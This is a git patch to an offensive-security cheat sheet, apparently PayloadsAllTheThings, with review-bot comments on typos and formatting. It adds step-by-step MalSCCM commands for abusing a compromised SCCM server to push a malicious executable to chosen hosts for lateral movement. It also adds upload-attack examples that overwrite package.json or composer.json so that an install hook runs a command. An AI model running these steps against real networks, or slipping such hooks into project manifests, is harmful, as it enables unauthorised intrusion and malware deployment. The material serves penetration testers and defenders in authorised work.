From 67457ec58286fadf978c1c1f93a17e5d2f9a0be8 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Mon, 9 May 2022 15:14:26 +0200 Subject: [PATCH] SCCM deployment + JSON uploads --- .../Active Directory Attack.md | 61 ++++++++++++++++++- Upload Insecure Files/README.md | 20 +++++- 2 files changed, 78 insertions(+), 3 deletions(-) diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 527b4f8..49ba3a5 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -105,6 +105,7 @@ - [Kerberos Resource Based Constrained Delegation](#kerberos-resource-based-constrained-delegation) - [Kerberos Bronze Bit Attack - CVE-2020-17049](#kerberos-bronze-bit-attack---cve-2020-17049) - [PrivExchange attack](#privexchange-attack) + - [SCCM Deployment](#sccm-deployment) - [RODC - Read Only Domain Controller Compromise](#rodc---read-only-domain-controller-compromise) - [PXE Boot image attack](#pxe-boot-image-attack) - [DSRM Credentials](#dsrm-credentials) 
@@ -3238,6 +3239,63 @@ python Exchange2domain.py -ah attackterip -ap listenport -u user -p password -d python Exchange2domain.py -ah attackterip -u user -p password -d domain.com -th DCip --just-dc-user krbtgt MailServerip ``` +### SCCM Deployment + +> SCCM is a solution from Microsoft to enhance administration in a scalable way across an organisation. + +* [PowerSCCM - PowerShell module to interact with SCCM deployments](https://github.com/PowerShellMafia/PowerSCCM) +* [MalSCCM - Abuse local or remote SCCM servers to deploy malicious applications to hosts they manage](https://github.com/nettitude/MalSCCM) + +* Compromise client, use locate to find management server + ```ps1 + MalSCCM.exe locate + ``` +* Enumerate over WMI as an administrator of the Distribution Point + ```ps1 + MalSCCM.exe inspect /server: /groups + ``` +* Compromise management server, use locate to find primary server +* use Inspect on primary server to view who you can target + ```ps1 + MalSCCM.exe inspect /all + MalSCCM.exe inspect /computers + MalSCCM.exe inspect /primaryusers + MalSCCM.exe inspect /groups + ``` +* Create a new device group for the machines you want to laterally move too + ```ps1 + MalSCCM.exe group /create /groupname:TargetGroup /grouptype:device + MalSCCM.exe inspect /groups + ``` + +* Add your targets into the new group + ```ps1 + MalSCCM.exe group /addhost /groupname:TargetGroup /host:WIN2016-SQL + ``` +* Create an application pointing to a malicious EXE on a world readable share : `SCCMContentLib$` + ```ps1 + MalSCCM.exe app /create /name:demoapp /uncpath:"\\BLORE-SCCM\SCCMContentLib$\localthread.exe" + MalSCCM.exe inspect /applications + ``` + +* Deploy the application to the target group + ```ps1 + MalSCCM.exe app /deploy /name:demoapp /groupname:TargetGroup /assignmentname:demodeployment + MalSCCM.exe inspect /deployments + ``` +* Force the target group to checkin for updates + ```ps1 + MalSCCM.exe checkin /groupname:TargetGroup + ``` + +* Cleanup the application, 
deployment and group + ```ps1 + MalSCCM.exe app /cleanup /name:demoapp + MalSCCM.exe group /delete /groupname:TargetGroup + ``` + + + ### RODC - Read Only Domain Controller Compromise > If the user is included in the **Allowed RODC Password Replication**, their credentials are stored in the server, and the **msDS-RevealedList** attribute of the RODC is populated with the username. @@ -3585,4 +3643,5 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae * [The Kerberos Key List Attack: The return of the Read Only Domain Controllers - Leandro Cuozzo](https://www.secureauth.com/blog/the-kerberos-key-list-attack-the-return-of-the-read-only-domain-controllers/) * [AD CS: weaponizing the ESC7 attack - Kurosh Dabbagh - 26 January, 2022](https://www.blackarrow.net/adcs-weaponizing-esc7-attack/) * [AD CS: from ManageCA to RCE - 11 February, 2022 - Pablo Martínez, Kurosh Dabbagh](https://www.blackarrow.net/ad-cs-from-manageca-to-rce/) -* [Introducing the Golden GMSA Attack - YUVAL GORDON - March 01, 2022](https://www.semperis.com/blog/golden-gmsa-attack/) \ No newline at end of file +* [Introducing the Golden GMSA Attack - YUVAL GORDON - March 01, 2022](https://www.semperis.com/blog/golden-gmsa-attack/) +* [Introducing MalSCCM - Phil Keeble -May 4, 2022](https://labs.nettitude.com/blog/introducing-malsccm/) diff --git a/Upload Insecure Files/README.md b/Upload Insecure Files/README.md index 3e89611..54b30cb 100644 --- a/Upload Insecure Files/README.md +++ b/Upload Insecure Files/README.md 
@@ -96,8 +96,9 @@ Valid pictures hosting PHP code. Upload the picture and use a local file inclusi ### Configuration Files -If you are trying to upload files to a PHP server, take a look at the .htaccess trick to execute code. -If you are trying to upload files to an ASP server, take a look at the .config trick to execute code. +If you are trying to upload files to a : +- PHP server, take a look at the .htaccess trick to execute code. +- ASP server, take a look at the .config trick to execute code. Configuration files examples - .htaccess @@ -105,6 +106,21 @@ Configuration files examples - httpd.conf - \_\_init\_\_.py +Alternatively you may be able to upload a JSON file with a custom scripts, try to overwrite a dependency manager configuration file. +- package.json + ```js + "scripts": { + "prepare" : "/bin/touch /tmp/pwned.txt" + } + ``` +- composer.json + ```js + "scripts": { + "pre-command-run" : [ + "/bin/touch /tmp/pwned.txt" + ] + } + ``` ### CVE - Image Tragik
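Review bot: In the `@@ -3238` hunk the command `MalSCCM.exe inspect /server: /groups` has an empty `/server:` value, so a reader cannot tell whether the argument is optional or must be filled in; a labelled placeholder such as `/server:<DistributionPointHostname>` would match the style of the other bullets, which spell out their arguments. The same hunk has a typo in "the machines you want to laterally move too" ("to"), and the blank lines between bullets are inconsistent (some bullets are separated by an empty line, others are not), which renders as two separate lists in Markdown; either drop all the blank lines or put one between every bullet.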
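Review bot: The new reference line in the `@@ -3585` hunk is missing a space after the dash: `Phil Keeble -May 4, 2022` should read `Phil Keeble - May 4, 2022` to match the `Author - Date` format of the surrounding entries. Restoring the trailing newline that the previous version lacked (`\ No newline at end of file`) is a welcome side fix.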
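Review bot: In the `@@ -96` hunk the new lead-in `If you are trying to upload files to a :` has a stray space before the colon; `If you are trying to upload files to a:` reads cleanly with the two list items that follow it.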
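Review bot: The `@@ -105` hunk has a grammar slip in `a JSON file with a custom scripts` (drop the article or the plural), and the sentence runs two ideas together; splitting it into "Alternatively you may be able to upload a JSON file with custom scripts: try to overwrite a dependency manager configuration file." keeps the meaning while reading as one instruction. The two code blocks are tagged ```js but contain JSON fragments; tagging them ```json (or labelling them as fragments of `package.json` and `composer.json`) would be accurate, and a short note on when each dependency manager runs the named hook (the npm `prepare` lifecycle script and the Composer `pre-command-run` event) would tell readers what triggers the behaviour and therefore what to watch for when reviewing uploaded or modified manifest files.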